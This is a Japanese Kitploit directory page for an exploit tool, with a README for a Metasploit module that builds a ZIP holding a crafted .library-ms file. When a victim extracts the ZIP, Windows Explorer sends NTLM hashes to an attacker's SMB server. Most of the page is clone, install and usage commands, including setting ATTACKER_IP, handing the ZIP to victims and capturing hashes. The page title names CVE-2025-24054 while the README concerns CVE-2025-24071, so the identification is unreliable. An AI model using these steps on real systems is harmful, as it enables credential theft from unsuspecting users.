Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-24054 — CVE-2025-24054 用の POC | Kitploit
ツール/GitHubGitHub/fomovet/cve-2025-24054
ペネトレーションテストフレームワークエクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイトコマンド&コントロール
GitHubfomovet/cve-2025-24054

cve-2025-24054

CVE-2025-24054 用の POC

リポジトリを見る
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24071: .library-ms ファイルを介した NTLM ハッシュ漏えい (Metasploit モジュール)

このリポジトリには、ZIP アーカイブから悪意のある .library-ms ファイルが展開されたときに NTLM ハッシュを漏えいさせる Windows Explorer の脆弱性 CVE-2025-24071 を悪用するための Metasploit モジュール が含まれています。

開発者: FOLKS-IWD


概要

この脆弱性は、ユーザーが特別に細工された .library-ms ファイルを含む ZIP アーカイブを展開したときに発生します。Windows Explorer は、ファイル内で指定されたリモートサーバーに対して SMB 認証要求を自動的に開始し、ユーザーの操作なしに NTLM ハッシュを漏えいさせます。

この Metasploit モジュール:

  1. 悪意のある .library-ms ファイルを生成します。
  2. それを ZIP アーカイブにパッケージ化します。
  3. Metasploit の SMB キャプチャ機能と統合して NTLM ハッシュを収集します。 image

インストール

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. モジュールを Metasploit のモジュールディレクトリにコピーします:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    
ツールをダウンロード

使用方法

  1. モジュールをロードします:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. 必要なオプションを設定します:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. モジュールを実行します:
root@kitploit:~
  run
  1. モジュールは悪意のある ZIP ファイル (exploit.zip) を生成します。このファイルをホストして、被害者にダウンロードおよび展開させます。
  2. Metasploit の SMB キャプチャモジュールを使用して NTLM ハッシュを収集します:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run